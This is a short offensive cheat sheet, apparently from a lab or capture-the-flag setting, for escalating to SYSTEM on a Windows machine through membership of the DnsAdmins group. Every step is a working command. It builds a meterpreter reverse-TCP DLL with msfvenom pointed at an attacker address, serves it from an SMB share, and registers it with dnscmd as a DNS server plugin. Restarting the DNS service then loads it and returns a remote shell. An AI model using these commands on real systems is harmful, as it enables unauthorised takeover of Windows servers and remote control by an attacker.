# If you control any account member of the "DnsAdmin" group# You can use it to privesc on the machine# It works by adding a malicious DLL loaded by the DNS service.# You have to restart the service and the DLL will be loaded as SYSTEM
# Generating the DLL
$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.28 LPORT=5566 -f dll > privesc.dll
# Host the DLL on a SMD server or upload it on the target machine
$ sudo smbserver.py MYSHARE /path/to/dll -smb2support
# On the target machine, update the DNS configuration and give it the DLL
PS > dnscmd 10.10.10.169 /config /serverlevelplugindll \\10.10.14.28\TESTLOL\privesc.dll
# You can check if the DLL has been correctly loaded
PS > Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
# Then restart the DNS service
PS > sc.exe stop dns
PS > sc.exe query dns
PS > sc.exe start dns
# If the exploit worked you should get a meterpreter